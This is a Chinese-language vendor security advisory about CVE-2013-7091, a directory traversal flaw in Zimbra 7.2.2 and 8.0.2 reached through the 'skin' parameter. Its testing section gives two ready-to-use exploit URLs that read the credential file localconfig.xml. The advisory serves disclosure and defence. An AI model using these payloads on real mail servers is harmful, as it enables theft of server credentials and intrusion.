当前位置: 首页 > 服务与支持 > 产品升级公告 > 安全漏洞公告

服务与支持Support

Zimbra \'skin\'参数本地文件包含漏洞

     发表日期:2014-12-08 13:31:43

Zimbra \'skin\'参数本地文件包含漏洞

BugTraq-ID:64149

CVE-ID:CVE-2013-7091

发布日期:2013-12-06

更新日期:2013-12-06

受影响系统:

Zimbra Zimbra 8.0.2

Zimbra Zimbra 7.2.2

详细信息:

Zimbra可提供开源电子邮件服务器软件及共享日历。 Zimbra 7.2.2及8.0.2版本,/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz存在目录遍历漏洞,远程攻击者通过skin参数内的"..",利用此漏洞可读取任意文件。

来源:

rubina119

测试方法:

警告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!https://mail.example.com/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 https://mail.example.com:7071/zimbraAdmin/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00

解决办法:

厂商补丁:

Zimbra

------

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.zimbra.com/